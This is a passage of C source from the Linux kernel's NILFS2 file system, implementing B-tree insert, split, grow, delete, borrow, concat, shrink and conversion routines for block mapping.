path[level].bp_index -= n;
}
nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
}
static void nilfs_btree_carry_right(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *right;
int nchildren, rnchildren, n, move, ncblk;
node = nilfs_btree_get_nonroot_node(path, level);
right = nilfs_btree_get_sib_node(path, level);
nchildren = nilfs_btree_node_get_nchildren(node);
rnchildren = nilfs_btree_node_get_nchildren(right);
ncblk = nilfs_btree_nchildren_per_block(btree);
move = 0;
n = (nchildren + rnchildren + 1) / 2 - rnchildren;
if (n > nchildren - path[level].bp_index) {
/* move insert point */
n--;
move = 1;
}
nilfs_btree_node_move_right(node, right, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
path[level + 1].bp_index++;
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(right, 0));
path[level + 1].bp_index--;
if (move) {
brelse(path[level].bp_bh);
path[level].bp_bh = path[level].bp_sib_bh;
path[level].bp_sib_bh = NULL;
path[level].bp_index -= nilfs_btree_node_get_nchildren(node);
path[level + 1].bp_index++;
} else {
brelse(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
}
nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
}
static void nilfs_btree_split(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *right;
__u64 newkey;
__u64 newptr;
int nchildren, n, move, ncblk;
node = nilfs_btree_get_nonroot_node(path, level);
right = nilfs_btree_get_sib_node(path, level);
nchildren = nilfs_btree_node_get_nchildren(node);
ncblk = nilfs_btree_nchildren_per_block(btree);
move = 0;
n = (nchildren + 1) / 2;
if (n > nchildren - path[level].bp_index) {
n--;
move = 1;
}
nilfs_btree_node_move_right(node, right, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
newkey = nilfs_btree_node_get_key(right, 0);
newptr = path[level].bp_newreq.bpr_ptr;
if (move) {
path[level].bp_index -= nilfs_btree_node_get_nchildren(node);
nilfs_btree_node_insert(right, path[level].bp_index,
*keyp, *ptrp, ncblk);
*keyp = nilfs_btree_node_get_key(right, 0);
*ptrp = path[level].bp_newreq.bpr_ptr;
brelse(path[level].bp_bh);
path[level].bp_bh = path[level].bp_sib_bh;
path[level].bp_sib_bh = NULL;
} else {
nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
*keyp = nilfs_btree_node_get_key(right, 0);
*ptrp = path[level].bp_newreq.bpr_ptr;
brelse(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
}
path[level + 1].bp_index++;
}
static void nilfs_btree_grow(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *root, *child;
int n, ncblk;
root = nilfs_btree_get_root(btree);
child = nilfs_btree_get_sib_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
n = nilfs_btree_node_get_nchildren(root);
nilfs_btree_node_move_right(root, child, n,
NILFS_BTREE_ROOT_NCHILDREN_MAX, ncblk);
nilfs_btree_node_set_level(root, level + 1);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
path[level].bp_bh = path[level].bp_sib_bh;
path[level].bp_sib_bh = NULL;
nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
*keyp = nilfs_btree_node_get_key(child, 0);
*ptrp = path[level].bp_newreq.bpr_ptr;
}
static __u64 nilfs_btree_find_near(const struct nilfs_bmap *btree,
const struct nilfs_btree_path *path)
{
struct nilfs_btree_node *node;
int level, ncmax;
if (path == NULL)
return NILFS_BMAP_INVALID_PTR;
/* left sibling */
level = NILFS_BTREE_LEVEL_NODE_MIN;
if (path[level].bp_index > 0) {
node = nilfs_btree_get_node(btree, path, level, &ncmax);
return nilfs_btree_node_get_ptr(node,
path[level].bp_index - 1,
ncmax);
}
/* parent */
level = NILFS_BTREE_LEVEL_NODE_MIN + 1;
if (level <= nilfs_btree_height(btree) - 1) {
node = nilfs_btree_get_node(btree, path, level, &ncmax);
return nilfs_btree_node_get_ptr(node, path[level].bp_index,
ncmax);
}
return NILFS_BMAP_INVALID_PTR;
}
static __u64 nilfs_btree_find_target_v(const struct nilfs_bmap *btree,
const struct nilfs_btree_path *path,
__u64 key)
{
__u64 ptr;
ptr = nilfs_bmap_find_target_seq(btree, key);
if (ptr != NILFS_BMAP_INVALID_PTR)
/* sequential access */
return ptr;
else {
ptr = nilfs_btree_find_near(btree, path);
if (ptr != NILFS_BMAP_INVALID_PTR)
/* near */
return ptr;
}
/* block group */
return nilfs_bmap_find_target_in_group(btree);
}
static int nilfs_btree_prepare_insert(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int *levelp, __u64 key, __u64 ptr,
struct nilfs_bmap_stats *stats)
{
struct buffer_head *bh;
struct nilfs_btree_node *node, *parent, *sib;
__u64 sibptr;
int pindex, level, ncmax, ncblk, ret;
struct inode *dat = NULL;
stats->bs_nblocks = 0;
level = NILFS_BTREE_LEVEL_DATA;
/* allocate a new ptr for data block */
if (NILFS_BMAP_USE_VBN(btree)) {
path[level].bp_newreq.bpr_ptr =
nilfs_btree_find_target_v(btree, path, key);
dat = nilfs_bmap_get_dat(btree);
}
ret = nilfs_bmap_prepare_alloc_ptr(btree, &path[level].bp_newreq, dat);
if (ret < 0)
goto err_out_data;
ncblk = nilfs_btree_nchildren_per_block(btree);
for (level = NILFS_BTREE_LEVEL_NODE_MIN;
level < nilfs_btree_height(btree) - 1;
level++) {
node = nilfs_btree_get_nonroot_node(path, level);
if (nilfs_btree_node_get_nchildren(node) < ncblk) {
path[level].bp_op = nilfs_btree_do_insert;
stats->bs_nblocks++;
goto out;
}
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
pindex = path[level + 1].bp_index;
/* left sibling */
if (pindex > 0) {
sibptr = nilfs_btree_node_get_ptr(parent, pindex - 1,
ncmax);
ret = nilfs_btree_get_block(btree, sibptr, &bh);
if (ret < 0)
goto err_out_child_node;
sib = (struct nilfs_btree_node *)bh->b_data;
if (nilfs_btree_node_get_nchildren(sib) < ncblk) {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_carry_left;
stats->bs_nblocks++;
goto out;
} else {
brelse(bh);
}
}
/* right sibling */
if (pindex < nilfs_btree_node_get_nchildren(parent) - 1) {
sibptr = nilfs_btree_node_get_ptr(parent, pindex + 1,
ncmax);
ret = nilfs_btree_get_block(btree, sibptr, &bh);
if (ret < 0)
goto err_out_child_node;
sib = (struct nilfs_btree_node *)bh->b_data;
if (nilfs_btree_node_get_nchildren(sib) < ncblk) {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_carry_right;
stats->bs_nblocks++;
goto out;
} else {
brelse(bh);
}
}
/* split */
path[level].bp_newreq.bpr_ptr =
path[level - 1].bp_newreq.bpr_ptr + 1;
ret = nilfs_bmap_prepare_alloc_ptr(btree,
&path[level].bp_newreq, dat);
if (ret < 0)
goto err_out_child_node;
ret = nilfs_btree_get_new_block(btree,
path[level].bp_newreq.bpr_ptr,
&bh);
if (ret < 0)
goto err_out_curr_node;
stats->bs_nblocks++;
sib = (struct nilfs_btree_node *)bh->b_data;
nilfs_btree_node_init(sib, 0, level, 0, ncblk, NULL, NULL);
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_split;
}
/* root */
node = nilfs_btree_get_root(btree);
if (nilfs_btree_node_get_nchildren(node) <
NILFS_BTREE_ROOT_NCHILDREN_MAX) {
path[level].bp_op = nilfs_btree_do_insert;
stats->bs_nblocks++;
goto out;
}
/* grow */
path[level].bp_newreq.bpr_ptr = path[level - 1].bp_newreq.bpr_ptr + 1;
ret = nilfs_bmap_prepare_alloc_ptr(btree, &path[level].bp_newreq, dat);
if (ret < 0)
goto err_out_child_node;
ret = nilfs_btree_get_new_block(btree, path[level].bp_newreq.bpr_ptr,
&bh);
if (ret < 0)
goto err_out_curr_node;
nilfs_btree_node_init((struct nilfs_btree_node *)bh->b_data,
0, level, 0, ncblk, NULL, NULL);
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_grow;
level++;
path[level].bp_op = nilfs_btree_do_insert;
/* a newly-created node block and a data block are added */
stats->bs_nblocks += 2;
/* success */
out:
*levelp = level;
return ret;
/* error */
err_out_curr_node:
nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
err_out_child_node:
for (level--; level > NILFS_BTREE_LEVEL_DATA; level--) {
nilfs_btnode_delete(path[level].bp_sib_bh);
nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
}
nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
err_out_data:
*levelp = level;
stats->bs_nblocks = 0;
return ret;
}
static void nilfs_btree_commit_insert(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int maxlevel, __u64 key, __u64 ptr)
{
struct inode *dat = NULL;
int level;
set_buffer_nilfs_volatile((struct buffer_head *)((unsigned long)ptr));
ptr = path[NILFS_BTREE_LEVEL_DATA].bp_newreq.bpr_ptr;
if (NILFS_BMAP_USE_VBN(btree)) {
nilfs_bmap_set_target_v(btree, key, ptr);
dat = nilfs_bmap_get_dat(btree);
}
for (level = NILFS_BTREE_LEVEL_NODE_MIN; level <= maxlevel; level++) {
nilfs_bmap_commit_alloc_ptr(btree,
&path[level - 1].bp_newreq, dat);
path[level].bp_op(btree, path, level, &key, &ptr);
}
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
}
static int nilfs_btree_insert(struct nilfs_bmap *btree, __u64 key, __u64 ptr)
{
struct nilfs_btree_path *path;
struct nilfs_bmap_stats stats;
int level, ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, NULL,
NILFS_BTREE_LEVEL_NODE_MIN, 0);
if (ret != -ENOENT) {
if (ret == 0)
ret = -EEXIST;
goto out;
}
ret = nilfs_btree_prepare_insert(btree, path, &level, key, ptr, &stats);
if (ret < 0)
goto out;
nilfs_btree_commit_insert(btree, path, level, key, ptr);
nilfs_inode_add_blocks(btree->b_inode, stats.bs_nblocks);
out:
nilfs_btree_free_path(path);
return ret;
}
static void nilfs_btree_do_delete(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node;
int ncblk;
if (level < nilfs_btree_height(btree) - 1) {
node = nilfs_btree_get_nonroot_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
nilfs_btree_node_delete(node, path[level].bp_index,
keyp, ptrp, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (path[level].bp_index == 0)
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(node, 0));
} else {
node = nilfs_btree_get_root(btree);
nilfs_btree_node_delete(node, path[level].bp_index,
keyp, ptrp,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
}
}
static void nilfs_btree_borrow_left(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *left;
int nchildren, lnchildren, n, ncblk;
nilfs_btree_do_delete(btree, path, level, keyp, ptrp);
node = nilfs_btree_get_nonroot_node(path, level);
left = nilfs_btree_get_sib_node(path, level);
nchildren = nilfs_btree_node_get_nchildren(node);
lnchildren = nilfs_btree_node_get_nchildren(left);
ncblk = nilfs_btree_nchildren_per_block(btree);
n = (nchildren + lnchildren) / 2 - nchildren;
nilfs_btree_node_move_right(left, node, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(node, 0));
brelse(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
path[level].bp_index += n;
}
static void nilfs_btree_borrow_right(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *right;
int nchildren, rnchildren, n, ncblk;
nilfs_btree_do_delete(btree, path, level, keyp, ptrp);
node = nilfs_btree_get_nonroot_node(path, level);
right = nilfs_btree_get_sib_node(path, level);
nchildren = nilfs_btree_node_get_nchildren(node);
rnchildren = nilfs_btree_node_get_nchildren(right);
ncblk = nilfs_btree_nchildren_per_block(btree);
n = (nchildren + rnchildren) / 2 - nchildren;
nilfs_btree_node_move_left(node, right, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
path[level + 1].bp_index++;
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(right, 0));
path[level + 1].bp_index--;
brelse(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
}
static void nilfs_btree_concat_left(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *left;
int n, ncblk;
nilfs_btree_do_delete(btree, path, level, keyp, ptrp);
node = nilfs_btree_get_nonroot_node(path, level);
left = nilfs_btree_get_sib_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
n = nilfs_btree_node_get_nchildren(node);
nilfs_btree_node_move_left(left, node, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
nilfs_btnode_delete(path[level].bp_bh);
path[level].bp_bh = path[level].bp_sib_bh;
path[level].bp_sib_bh = NULL;
path[level].bp_index += nilfs_btree_node_get_nchildren(left);
}
static void nilfs_btree_concat_right(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *right;
int n, ncblk;
nilfs_btree_do_delete(btree, path, level, keyp, ptrp);
node = nilfs_btree_get_nonroot_node(path, level);
right = nilfs_btree_get_sib_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
n = nilfs_btree_node_get_nchildren(right);
nilfs_btree_node_move_left(node, right, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
nilfs_btnode_delete(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
path[level + 1].bp_index++;
}
static void nilfs_btree_shrink(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *root, *child;
int n, ncblk;
nilfs_btree_do_delete(btree, path, level, keyp, ptrp);
root = nilfs_btree_get_root(btree);
child = nilfs_btree_get_nonroot_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
nilfs_btree_node_delete(root, 0, NULL, NULL,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
nilfs_btree_node_set_level(root, level);
n = nilfs_btree_node_get_nchildren(child);
nilfs_btree_node_move_left(root, child, n,
NILFS_BTREE_ROOT_NCHILDREN_MAX, ncblk);
nilfs_btnode_delete(path[level].bp_bh);
path[level].bp_bh = NULL;
}
static void nilfs_btree_nop(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
}
static int nilfs_btree_prepare_delete(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int *levelp,
struct nilfs_bmap_stats *stats,
struct inode *dat)
{
struct buffer_head *bh;
struct nilfs_btree_node *node, *parent, *sib;
__u64 sibptr;
int pindex, dindex, level, ncmin, ncmax, ncblk, ret;
ret = 0;
stats->bs_nblocks = 0;
ncmin = NILFS_BTREE_NODE_NCHILDREN_MIN(nilfs_btree_node_size(btree));
ncblk = nilfs_btree_nchildren_per_block(btree);
for (level = NILFS_BTREE_LEVEL_NODE_MIN, dindex = path[level].bp_index;
level < nilfs_btree_height(btree) - 1;
level++) {
node = nilfs_btree_get_nonroot_node(path, level);
path[level].bp_oldreq.bpr_ptr =
nilfs_btree_node_get_ptr(node, dindex, ncblk);
ret = nilfs_bmap_prepare_end_ptr(btree,
&path[level].bp_oldreq, dat);
if (ret < 0)
goto err_out_child_node;
if (nilfs_btree_node_get_nchildren(node) > ncmin) {
path[level].bp_op = nilfs_btree_do_delete;
stats->bs_nblocks++;
goto out;
}
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
pindex = path[level + 1].bp_index;
dindex = pindex;
if (pindex > 0) {
/* left sibling */
sibptr = nilfs_btree_node_get_ptr(parent, pindex - 1,
ncmax);
ret = nilfs_btree_get_block(btree, sibptr, &bh);
if (ret < 0)
goto err_out_curr_node;
sib = (struct nilfs_btree_node *)bh->b_data;
if (nilfs_btree_node_get_nchildren(sib) > ncmin) {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_borrow_left;
stats->bs_nblocks++;
goto out;
} else {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_concat_left;
stats->bs_nblocks++;
/* continue; */
}
} else if (pindex <
nilfs_btree_node_get_nchildren(parent) - 1) {
/* right sibling */
sibptr = nilfs_btree_node_get_ptr(parent, pindex + 1,
ncmax);
ret = nilfs_btree_get_block(btree, sibptr, &bh);
if (ret < 0)
goto err_out_curr_node;
sib = (struct nilfs_btree_node *)bh->b_data;
if (nilfs_btree_node_get_nchildren(sib) > ncmin) {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_borrow_right;
stats->bs_nblocks++;
goto out;
} else {
path[level].bp_sib_bh = bh;
path[level].bp_op = nilfs_btree_concat_right;
stats->bs_nblocks++;
/*
* When merging right sibling node
* into the current node, pointer to
* the right sibling node must be
* terminated instead. The adjustment
* below is required for that.
*/
dindex = pindex + 1;
/* continue; */
}
} else {
/* no siblings */
/* the only child of the root node */
WARN_ON(level != nilfs_btree_height(btree) - 2);
if (nilfs_btree_node_get_nchildren(node) - 1 <=
NILFS_BTREE_ROOT_NCHILDREN_MAX) {
path[level].bp_op = nilfs_btree_shrink;
stats->bs_nblocks += 2;
level++;
path[level].bp_op = nilfs_btree_nop;
goto shrink_root_child;
} else {
path[level].bp_op = nilfs_btree_do_delete;
stats->bs_nblocks++;
goto out;
}
}
}
/* child of the root node is deleted */
path[level].bp_op = nilfs_btree_do_delete;
stats->bs_nblocks++;
shrink_root_child:
node = nilfs_btree_get_root(btree);
path[level].bp_oldreq.bpr_ptr =
nilfs_btree_node_get_ptr(node, dindex,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
ret = nilfs_bmap_prepare_end_ptr(btree, &path[level].bp_oldreq, dat);
if (ret < 0)
goto err_out_child_node;
/* success */
out:
*levelp = level;
return ret;
/* error */
err_out_curr_node:
nilfs_bmap_abort_end_ptr(btree, &path[level].bp_oldreq, dat);
err_out_child_node:
for (level--; level >= NILFS_BTREE_LEVEL_NODE_MIN; level--) {
brelse(path[level].bp_sib_bh);
nilfs_bmap_abort_end_ptr(btree, &path[level].bp_oldreq, dat);
}
*levelp = level;
stats->bs_nblocks = 0;
return ret;
}
static void nilfs_btree_commit_delete(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int maxlevel, struct inode *dat)
{
int level;
for (level = NILFS_BTREE_LEVEL_NODE_MIN; level <= maxlevel; level++) {
nilfs_bmap_commit_end_ptr(btree, &path[level].bp_oldreq, dat);
path[level].bp_op(btree, path, level, NULL, NULL);
}
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
}
static int nilfs_btree_delete(struct nilfs_bmap *btree, __u64 key)
{
struct nilfs_btree_path *path;
struct nilfs_bmap_stats stats;
struct inode *dat;
int level, ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, NULL,
NILFS_BTREE_LEVEL_NODE_MIN, 0);
if (ret < 0)
goto out;
dat = NILFS_BMAP_USE_VBN(btree) ? nilfs_bmap_get_dat(btree) : NULL;
ret = nilfs_btree_prepare_delete(btree, path, &level, &stats, dat);
if (ret < 0)
goto out;
nilfs_btree_commit_delete(btree, path, level, dat);
nilfs_inode_sub_blocks(btree->b_inode, stats.bs_nblocks);
out:
nilfs_btree_free_path(path);
return ret;
}
static int nilfs_btree_last_key(const struct nilfs_bmap *btree, __u64 *keyp)
{
struct nilfs_btree_path *path;
int ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup_last(btree, path, keyp, NULL);
nilfs_btree_free_path(path);
return ret;
}
static int nilfs_btree_check_delete(struct nilfs_bmap *btree, __u64 key)
{
struct buffer_head *bh;
struct nilfs_btree_node *root, *node;
__u64 maxkey, nextmaxkey;
__u64 ptr;
int nchildren, ret;
root = nilfs_btree_get_root(btree);
switch (nilfs_btree_height(btree)) {
case 2:
bh = NULL;
node = root;
break;
case 3:
nchildren = nilfs_btree_node_get_nchildren(root);
if (nchildren > 1)
return 0;
ptr = nilfs_btree_node_get_ptr(root, nchildren - 1,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
ret = nilfs_btree_get_block(btree, ptr, &bh);
if (ret < 0)
return ret;
node = (struct nilfs_btree_node *)bh->b_data;
break;
default:
return 0;
}
nchildren = nilfs_btree_node_get_nchildren(node);
maxkey = nilfs_btree_node_get_key(node, nchildren - 1);
nextmaxkey = (nchildren > 1) ?
nilfs_btree_node_get_key(node, nchildren - 2) : 0;
if (bh != NULL)
brelse(bh);
return (maxkey == key) && (nextmaxkey < NILFS_BMAP_LARGE_LOW);
}
static int nilfs_btree_gather_data(struct nilfs_bmap *btree,
__u64 *keys, __u64 *ptrs, int nitems)
{
struct buffer_head *bh;
struct nilfs_btree_node *node, *root;
__le64 *dkeys;
__le64 *dptrs;
__u64 ptr;
int nchildren, ncmax, i, ret;
root = nilfs_btree_get_root(btree);
switch (nilfs_btree_height(btree)) {
case 2:
bh = NULL;
node = root;
ncmax = NILFS_BTREE_ROOT_NCHILDREN_MAX;
break;
case 3:
nchildren = nilfs_btree_node_get_nchildren(root);
WARN_ON(nchildren > 1);
ptr = nilfs_btree_node_get_ptr(root, nchildren - 1,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
ret = nilfs_btree_get_block(btree, ptr, &bh);
if (ret < 0)
return ret;
node = (struct nilfs_btree_node *)bh->b_data;
ncmax = nilfs_btree_nchildren_per_block(btree);
break;
default:
node = NULL;
return -EINVAL;
}
nchildren = nilfs_btree_node_get_nchildren(node);
if (nchildren < nitems)
nitems = nchildren;
dkeys = nilfs_btree_node_dkeys(node);
dptrs = nilfs_btree_node_dptrs(node, ncmax);
for (i = 0; i < nitems; i++) {
keys[i] = le64_to_cpu(dkeys[i]);
ptrs[i] = le64_to_cpu(dptrs[i]);
}
if (bh != NULL)
brelse(bh);
return nitems;
}
static int
nilfs_btree_prepare_convert_and_insert(struct nilfs_bmap *btree, __u64 key,
union nilfs_bmap_ptr_req *dreq,
union nilfs_bmap_ptr_req *nreq,
struct buffer_head **bhp,
struct nilfs_bmap_stats *stats)
{
struct buffer_head *bh;
struct inode *dat = NULL;
int ret;
stats->bs_nblocks = 0;
/* for data */
/* cannot find near ptr */
if (NILFS_BMAP_USE_VBN(btree)) {
dreq->bpr_ptr = nilfs_btree_find_target_v(btree, NULL, key);
dat = nilfs_bmap_get_dat(btree);
}
ret = nilfs_bmap_prepare_alloc_ptr(btree, dreq, dat);
if (ret < 0)
return ret;
*bhp = NULL;
stats->bs_nblocks++;
if (nreq != NULL) {
nreq->bpr_ptr = dreq->bpr_ptr + 1;
ret = nilfs_bmap_prepare_alloc_ptr(btree, nreq, dat);
if (ret < 0)
goto err_out_dreq;
ret = nilfs_btree_get_new_block(btree, nreq->bpr_ptr, &bh);
if (ret < 0)
goto err_out_nreq;
*bhp = bh;
stats->bs_nblocks++;
}
/* success */
return 0;
/* error */
err_out_nreq:
nilfs_bmap_abort_alloc_ptr(btree, nreq, dat);
err_out_dreq:
nilfs_bmap_abort_alloc_ptr(btree, dreq, dat);
stats->bs_nblocks = 0;
return ret;
}
static void
nilfs_btree_commit_convert_and_insert(struct nilfs_bmap *btree,
__u64 key, __u64 ptr,
const __u64 *keys, const __u64 *ptrs,
int n,
union nilfs_bmap_ptr_req *dreq,
union nilfs_bmap_ptr_req *nreq,
struct buffer_head *bh)
{
struct nilfs_btree_node *node;
struct inode *dat;
__u64 tmpptr;
int ncblk;
/* free resources */
if (btree->b_ops->bop_clear != NULL)
btree->b_ops->bop_clear(btree);
/* ptr must be a pointer to a buffer head. */
set_buffer_nilfs_volatile((struct buffer_head *)((unsigned long)ptr));
/* convert and insert */
dat = NILFS_BMAP_USE_VBN(btree) ? nilfs_bmap_get_dat(btree) : NULL;
nilfs_btree_init(btree);
if (nreq != NULL) {
nilfs_bmap_commit_alloc_ptr(btree, dreq, dat);
nilfs_bmap_commit_alloc_ptr(btree, nreq, dat);
/* create child node at level 1 */
node = (struct nilfs_btree_node *)bh->b_data;
ncblk = nilfs_btree_nchildren_per_block(btree);
nilfs_btree_node_init(node, 0, 1, n, ncblk, keys, ptrs);
nilfs_btree_node_insert(node, n, key, dreq->bpr_ptr, ncblk);
if (!buffer_dirty(bh))
mark_buffer_dirty(bh);
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
brelse(bh);
/* create root node at level 2 */
node = nilfs_btree_get_root(btree);
tmpptr = nreq->bpr_ptr;
nilfs_btree_node_init(node, NILFS_BTREE_NODE_ROOT, 2, 1,
NILFS_BTREE_ROOT_NCHILDREN_MAX,
&keys[0], &tmpptr);
} else {
nilfs_bmap_commit_alloc_ptr(btree, dreq, dat);
/* create root node at level 1 */
node = nilfs_btree_get_root(btree);
nilfs_btree_node_init(node, NILFS_BTREE_NODE_ROOT, 1, n,
NILFS_BTREE_ROOT_NCHILDREN_MAX,
keys, ptrs);
nilfs_btree_node_insert(node, n, key, dreq->bpr_ptr,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
}
if (NILFS_BMAP_USE_VBN(btree))
nilfs_bmap_set_target_v(btree, key, dreq->bpr_ptr);
}
/**
* nilfs_btree_convert_and_insert -
* @bmap:
* @key:
* @ptr:
* @keys:
* @ptrs:
* @n:
*/
int nilfs_btree_convert_and_insert(struct nilfs_bmap *btree,
__u64 key, __u64 ptr,
const __u64 *keys, const __u64 *ptrs, int n)
{
struct buffer_head *bh;
union nilfs_bmap_ptr_req dreq, nreq, *di, *ni;
struct nilfs_bmap_stats stats;
int ret;
if (n + 1 <= NILFS_BTREE_ROOT_NCHILDREN_MAX) {
di = &dreq;
ni = NULL;
} else if ((n + 1) <= NILFS_BTREE_NODE_NCHILDREN_MAX(
1 << btree->b_inode->i_blkbits)) {
di = &dreq;
ni = &nreq;
} else {
di = NULL;
ni = NULL;
BUG();
}
ret = nilfs_btree_prepare_convert_and_insert(btree, key, di, ni, &bh,
&stats);
if (ret < 0)
return ret;
nilfs_btree_commit_convert_and_insert(btree, key, ptr, keys, ptrs, n,
di, ni, bh);
nilfs_inode_add_blocks(btree->b_inode, stats.bs_nblocks);
return 0;
}
static int nilfs_btree_propagate_p(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level,
struct buffer_head *bh)
{
while ((++level < nilfs_btree_height(btree) - 1) &&
!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
return 0;
}
static int nilfs_btree_prepare_update_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, struct inode *dat)
{
struct nilfs_btree_node *parent;
int ncmax, ret;
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
path[level].bp_oldreq.bpr_ptr =
nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
ncmax);
path[level].bp_newreq.bpr_ptr = path[level].bp_oldreq.bpr_ptr + 1;
ret = nilfs_dat_prepare_update(dat, &path[level].bp_oldreq.bpr_req,
&path[level].bp_newreq.bpr_req);
if (ret < 0)
return ret;
if (buffer_nilfs_node(path[level].bp_bh)) {
path[level].bp_ctxt.oldkey = path[level].bp_oldreq.bpr_ptr;
path[level].bp_ctxt.newkey = path[level].bp_newreq.bpr_ptr;
path[level].bp_ctxt.bh = path[level].bp_bh;
ret = nilfs_btnode_prepare_change_key(
&NILFS_BMAP_I(btree)->i_btnode_cache,
&path[level].bp_ctxt);
if (ret < 0) {
nilfs_dat_abort_update(dat,
&path[level].bp_oldreq.bpr_req,
&path[level].bp_newreq.bpr_req);
return ret;
}
}
return 0;
}
static void nilfs_btree_commit_update_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, struct inode *dat)
{
struct nilfs_btree_node *parent;
int ncmax;
nilfs_dat_commit_update(dat, &path[level].bp_oldreq.bpr_req,
&path[level].bp_newreq.bpr_req,
btree->b_ptr_type == NILFS_BMAP_PTR_VS);
if (buffer_nilfs_node(path[level].bp_bh)) {
nilfs_btnode_commit_change_key(
&NILFS_BMAP_I(btree)->i_btnode_cache,
&path[level].bp_ctxt);
path[level].bp_bh = path[level].bp_ctxt.bh;
}
